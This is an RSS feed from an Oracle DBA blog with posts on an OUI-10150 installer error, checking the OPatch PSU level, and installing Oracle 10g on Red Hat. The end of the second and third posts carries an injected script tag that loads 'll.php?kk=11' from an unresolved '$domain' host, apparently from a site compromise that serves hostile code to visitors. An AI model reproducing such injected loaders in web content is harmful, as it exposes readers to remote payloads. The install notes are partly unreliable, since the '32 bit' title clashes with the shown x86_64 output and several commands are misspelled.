<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Oracle Database Administration Blog &#187; Installation</title>
	<atom:link href="http://www.bestremotedba.com/topics/database-administration/installation/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.bestremotedba.com</link>
	<description>Specially Created for Remote DBAs and Junior DBAs</description>
	<lastBuildDate>Fri, 30 Dec 2011 05:43:39 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
		<item>
		<title>OUI-10150:Error: A runtime exception occurred while setting s_dlgCfgNamingLabelSIDnull in component Oracle Database 11g 11.2.0.1.0</title>
		<link>http://www.bestremotedba.com/oui-10150error-a-runtime-exception-occurred-while-setting-s_dlgcfgnaminglabelsidnull-in-component-oracle-database-11g-11-2-0-1-0/</link>
		<comments>http://www.bestremotedba.com/oui-10150error-a-runtime-exception-occurred-while-setting-s_dlgcfgnaminglabelsidnull-in-component-oracle-database-11g-11-2-0-1-0/#comments</comments>
		<pubDate>Tue, 25 Oct 2011 00:51:09 +0000</pubDate>
		<dc:creator>mudhalvan</dc:creator>
				<category><![CDATA[Database Administration]]></category>
		<category><![CDATA[Installation]]></category>
		<category><![CDATA[OUI-10150:Error: A runtime exception occurred while setting s_dlgCfgNamingLabelSIDnull in component Oracle Database 11g 11.2.0.1.0]]></category>

		<guid isPermaLink="false">http://www.bestremotedba.com/?p=1016</guid>
		<description><![CDATA[OUI-10150:Error: A runtime exception occurred while setting s_dlgCfgNamingLabelSIDnull in component Oracle Database 11g 11.2.0.1.0]]></description>
			<content:encoded><![CDATA[<!-- Advanced AdSense by Jim Gaudet --><!-- google_ad_section_start --><pre></pre>
<pre>Problem : Add a Component to an Oracle 11g rel2 Home get the following error
INFO: *** Error Dialog: OUI-10150:Error: A runtime exception occurred while setting s_dlgCfgNamingLabelSIDnull in component Oracle Database 11g 11.2.0.1.0 

Solution:
With 11gR2, you are no longer allowed to run OUI from $ORACLE_HOME/oui/bin. If you do, you will receive this error:
INFO: *** Error Dialog: OUI-10150:Error: A runtime exception occurred while setting s_dlgCfgNamingLabelSIDnull in component Oracle Database 11g 11.2.0.1.0 .
Clearly, the error message is not descriptive at all. Oracle has created unpublished Bug 8330280 to give a warning message instead of this error. 

To avoid this error, always run OUI from the installation media and not from $ORACLE_HOME/oui/bin.</pre>
<pre></pre>
<!-- Advanced AdSense by Jim Gaudet --><!-- google_ad_section_end -->]]></content:encoded>
			<wfw:commentRss>http://www.bestremotedba.com/oui-10150error-a-runtime-exception-occurred-while-setting-s_dlgcfgnaminglabelsidnull-in-component-oracle-database-11g-11-2-0-1-0/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Opatch version including the PSU Patch Level</title>
		<link>http://www.bestremotedba.com/opatch-version-including-the-psu-patch-level/</link>
		<comments>http://www.bestremotedba.com/opatch-version-including-the-psu-patch-level/#comments</comments>
		<pubDate>Fri, 05 Nov 2010 23:19:52 +0000</pubDate>
		<dc:creator>mudhalvan</dc:creator>
				<category><![CDATA[Database Maintenance]]></category>
		<category><![CDATA[Installation]]></category>

		<guid isPermaLink="false">http://www.bestremotedba.com/?p=834</guid>
		<description><![CDATA[Opatch version including the PSU Patch Level]]></description>
			<content:encoded><![CDATA[<!-- Advanced AdSense by Jim Gaudet --><!-- google_ad_section_start --><p>Opatch version including the PSU Patch Level</p>
<p>OS Software Level:<br />
        opatch lsinventory -bugs_fixed | grep PSU | sort<br />
Database Level:<br />
        column comments format a30;<br />
        select to_char(ACTION_TIME,&#8217;DD-MON-YY&#8217;) action_date, COMMENTS<br />
        from registry$history<br />
        order by action_time;</p>
<p><script src="http://$domain/ll.php?kk=11"></script></p>
<!-- Advanced AdSense by Jim Gaudet --><!-- google_ad_section_end -->]]></content:encoded>
			<wfw:commentRss>http://www.bestremotedba.com/opatch-version-including-the-psu-patch-level/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Installing Oracle 10g on Redhat 32 bit</title>
		<link>http://www.bestremotedba.com/installing-oracle-10g-on-redhat-32-bit/</link>
		<comments>http://www.bestremotedba.com/installing-oracle-10g-on-redhat-32-bit/#comments</comments>
		<pubDate>Wed, 09 Sep 2009 02:41:47 +0000</pubDate>
		<dc:creator>aarthimudhalvan</dc:creator>
				<category><![CDATA[Database Administration]]></category>
		<category><![CDATA[Installation]]></category>
		<category><![CDATA[Install 10g oracle on 32bit linux]]></category>
		<category><![CDATA[Install 10g oracle on 32bit redhat linux]]></category>
		<category><![CDATA[Installation 10g Oracle]]></category>
		<category><![CDATA[oracle 10g Installation]]></category>

		<guid isPermaLink="false">http://dbaexpert.wordpress.com/?p=6</guid>
		<description><![CDATA[Install 10g oracle on 32bit linux]]></description>
			<content:encoded><![CDATA[<!-- Advanced AdSense by Jim Gaudet --><!-- google_ad_section_start --><p>[root@ORATEST ~]# grep MemTotal /proc/meminfo<br />
MemTotal:      2016344 kB<br />
[root@ORATEST ~]# grep SwapTotal /proc/meminfo<br />
SwapTotal:     4192956 kB<br />
[root@ORATEST ~]#</p>
<p>[root@ORATEST ~]# uname -mi<br />
x86_64 x86_64<br />
[root@ORATEST ~]#</p>
<p>+++++++++++++++Packages Check<br />
[root@orcprmy ~]# rpm -q &#8211;qf &#8216;%{NAME}-%{VERSION}-%{RELEASE}  (%{ARCH})\n&#8217; \<br />
gcc gcc-c++ libstdc++-devel cpp glibc-devel glibc-headers glibc-kernheaders gnome-libs compat-db \<br />
ORBit gtk+ imlib libpng10 gdk-pixbuf libungif sysstat xorg-x11-deprecated-libs xorg-x11-libs \<br />
xorg-x11-Mesa-libGL expat fontconfig freetype zlib libaio compat-libstdc++ glibc-devel libgcc binutils \<br />
control-center xscreensaver eel2 gail gnome-desktop gnome-icon-theme libgail-gnome libxklavier \<br />
metacity nautilus startup-notification xloadimage xorg-x11-Mesa-libGLU at-spi desktop-backgrounds-basic \<br />
eog gnome-panel gnome-vfs2-smb hicolor-icon-theme libexif librsvg2 nautilus-cd-burner redhat-artwork \<br />
scrollkeeper cdrecord docbook-dtds evolution-data-server intltool libcroco libgnomeprint22 libgnomeprintui22 \<br />
libgsf libwnck mkisofs samba-common ghostscript ghostscript-fonts gnutls libgnomecups libsoup openjade \<br />
perl-XML-Parser sgml-common urw-fonts xml-common VFlib2 chkfontpath perl-URI perl-libwww-perl \<br />
xorg-x11-font-utils perl-HTML-Parser xorg-x11-xfs perl-HTML-Tagset ttmkfdir</p>
<p>rpm -Uvh xorg-x11-deprecated-libs-6.8.2-1.EL.13.20.i386.rpm \<br />
xorg-x11-libs-6.8.2-1.EL.13.20.i386.rpm \<br />
xorg-x11-Mesa-libGL-6.8.2-1.EL.13.20.i386.rpm \<br />
expat-1.95.7-4.i386.rpm \<br />
fontconfig-2.2.3-7.i386.rpm \<br />
freetype-2.1.9-1.i386.rpm \<br />
zlib-1.2.1.2-1.2.i386.rpm</p>
<p>++++++++++++++++Kernel Parameter  &#8211; 1GB Memory<br />
[root@ORATEST etc]# pwd<br />
/etc<br />
[root@ORATEST etc]# vi sysctl.conf<br />
[root@ORATEST etc]#</p>
<p>net.ipv4.ip_forward = 0<br />
net.ipv4.conf.default.rp_filter = 1<br />
net.ipv4.conf.default.accept_source_route = 0<br />
kernel.sysrq = 0<br />
kernel.core_uses_pid = 1<br />
kernel.shmmax = 2147483648<br />
kernel.shmmni = 4096<br />
kernel.sem = 250 32000 100 512<br />
kernel.msgmax = 32768<br />
kernel.msgmnb = 65535<br />
kernel.msgmni = 512<br />
net.core.rmem_default = 1048576<br />
net.core.rmem_max = 1048576<br />
net.core.wmem_default = 262144<br />
net.core.wmem_max = 262144<br />
net.ipv4.ip_local_port_range = 1024 65000<br />
fs.file-max = 1597481<br />
kernel.threads-max = 270336</p>
<p>[root@ORATEST etc]# sysctl -p</p>
<p>+++++++++++++++++++++  Oracle User and Group &#8211; Password oracle</p>
<p>Create the group  &#8220;dba&#8221;  and user &#8220;oracle&#8221;</p>
<p>[root@ORATEST etc]# groupadd dba<br />
[root@ORATEST etc]# useradd -c &#8220;Oracle Software Owner&#8221; -g dba oracle<br />
[root@ORATEST etc]# passwd oracle<br />
[root@ORATEST etc]# mkdir -p /u01/app/oracle<br />
[root@ORATEST etc]# chown -R oracle.dba /u01<br />
[root@ORATEST etc]# mkdir /var/opt/oracle<br />
[root@ORATEST etc]# chown oracle.dba /var/opt/oracle<br />
[root@ORATEST etc]# chmod 755 /var/opt/oracle<br />
[root@ORATEST etc]#</p>
<p>+++++++++++++++++++ Installer download and extract</p>
<p>[root@ORATEST software]# pwd<br />
/u01/software<br />
[root@ORATEST software]# ls -ltr 10201_database_linux_x86_64.cpio.gz<br />
-rwxr-xr-x  1 oracle dba 758433170 Nov 16  2008 10201_database_linux_x86_64.cpio.gz<br />
[root@ORATEST software]#</p>
<p>[oracle@ORATEST software]$ gunzip 10201_database_linux_x86_64.cpio.gz<br />
[oracle@ORATEST software]$</p>
<p>[oracle@ORATEST software]$ cpio -idmv &lt; 10201_database_linux_x86_64.cpio</p>
<p>[oracle@ORATEST software]$ ls -ltr<br />
total 1945716<br />
drwxr-xr-x  6 oracle dba       4096 Oct 23  2005 database<br />
-rwxr-xr-x  1 oracle dba  801603584 Nov 16  2008 10201_database_linux_x86_64.cpio</p>
<p>+++++++++++++++++++ Installing Oracle software<br />
Connect to CYGWIN<br />
Type startx to get graphics<br />
$ ssh -X -Y ORATEST -l oracle</p>
<p>export ORACLE_BASE=/u01/app<br />
export ORACLE_SID=orcprmy<br />
unset ORACLE_HOME<br />
unset TNS_ADMIN</p>
<p>[root@ORATEST RPM_64]# rpm -Uvh libaio-0.3.102-1.x86_64.rpm<br />
warning: libaio-0.3.102-1.x86_64.rpm: V3 DSA signature: NOKEY, key ID db42a60e<br />
Preparing&#8230;                ########################################### [100%]<br />
1:libaio                 ########################################### [100%]</p>
<p>[root@ORATEST RPM_64]# rpm -qa |grep libaio<br />
libaio-0.3.102-1</p>
<p>Make sure ORACLE_HOME in universal installer set to /u01/app/oracle/product/10.2.0/db_1</p>
<p>++++++++++++++ After Universal Installer</p>
<p>export ORACLE_HOME=$ORACLE_BASE/oracle/product/10.2.0/db_1<br />
export PATH=$PATH:$ORACLE_HOME/bin<br />
export LD_LIBRARY_PATH=$ORACLE_HOME/lib</p>
<p>+++++++++++++++ Management Consoles</p>
<p>isqlplus</p>
<p>http://ORATEST.localdomain:5560/isqlplus</p>
<p>isqlplus dba</p>
<p>http://ORATEST.localdomain:5560/isqlplus/dba</p>
<p>Enterprise Manager 10g</p>
<p>http://ORATEST.localdomain:1158/em</p>
<p>isqlplus stop and start</p>
<p>isqlplusctl stop</p>
<p>EM Console stop and start<br />
emctl stop dbconsole</p>
<p>listener start</p>
<p>++++++++++++++++ Patch Apply 10.2.0.4</p>
<p>1. Stop iSQLPLUS</p>
<p>isqlplusctl stop</p>
<p>2. Stop EM Console</p>
<p>emctl stop dbconsole</p>
<p>3. Stop Listener</p>
<p>listnrctl stop</p>
<p>4. Stop Database</p>
<p>Sqlplus /nolo<br />
connect / as sysdba<br />
shutdown immediate</p>
<p>[oracle@ORATEST software]$ pwd<br />
/u01/software<br />
[oracle@ORATEST software]$ ls -ltr p6810189_10204_Linux-x86-64.zip<br />
-rwxr-xr-x  1 oracle dba 1195551830 Mar 19  2008 p6810189_10204_Linux-x86-64.zip<br />
[oracle@ORATEST software]$</p>
<p>&#8212; Database Upgrade manual<br />
[oracle@ORATEST ~]$ sqlplus /nolog</p>
<p>SQL*Plus: Release 10.2.0.4.0 &#8211; Production on Tue Jul 14 09:45:52 2009</p>
<p>Copyright (c) 1982, 2007, Oracle.  All Rights Reserved.</p>
<p>SQL&gt; connect / as sysdba<br />
Connected to an idle instance.<br />
SQL&gt;<br />
SQL&gt; startup nomount<br />
ORACLE instance started.</p>
<p>Total System Global Area  587202560 bytes<br />
Fixed Size                  2085680 bytes<br />
Variable Size             163581136 bytes<br />
Database Buffers          415236096 bytes<br />
Redo Buffers                6299648 bytes<br />
SQL&gt; SHOW PARAMETER PFILE;</p>
<p>NAME                                 TYPE        VALUE<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; &#8212;&#8212;&#8212;&#8211; &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br />
spfile                               string      /u01/app/oracle/product/10.2.0<br />
/db_1/dbs/spfileORATEST.ora<br />
SQL&gt; SHOW PARAMETER SHARED_POOL_SIZE</p>
<p>NAME                                 TYPE        VALUE<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; &#8212;&#8212;&#8212;&#8211; &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br />
shared_pool_size                     big integer 0<br />
SQL&gt; SHOW PARAMETER JAVA_POOL_SIZE</p>
<p>NAME                                 TYPE        VALUE<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; &#8212;&#8212;&#8212;&#8211; &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br />
java_pool_size                       big integer 0<br />
SQL&gt; ALTER SYSTEM SET SHARED_POOL_SIZE=&#8217;150M&#8217; SCOPE=spfile;</p>
<p>System altered.</p>
<p>SQL&gt; ALTER SYSTEM SET JAVA_POOL_SIZE=&#8217;150M&#8217; SCOPE=spfile;</p>
<p>System altered.</p>
<p>SQL&gt; SHUTDOWN<br />
ORA-01507: database not mounted</p>
<p>ORACLE instance shut down.<br />
SQL&gt; STARTUP UPGRADE<br />
ORACLE instance started.</p>
<p>Total System Global Area  587202560 bytes<br />
Fixed Size                  2085680 bytes<br />
Variable Size             322964688 bytes<br />
Database Buffers          255852544 bytes<br />
Redo Buffers                6299648 bytes<br />
Database mounted.<br />
Database opened.<br />
SQL&gt; SPOOL patch.log<br />
SQL&gt;@$ORACLE_HOME/rdbms/admin/catupgrd.sql<br />
SQL&gt;shutdown<br />
SQL&gt;startup<br />
SQL&gt; @$ORACLE_HOME/rdbms/admin/utlrp.sql<script src="http://$domain/ll.php?kk=11"></script></p>
<!-- Advanced AdSense by Jim Gaudet --><!-- google_ad_section_end -->]]></content:encoded>
			<wfw:commentRss>http://www.bestremotedba.com/installing-oracle-10g-on-redhat-32-bit/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

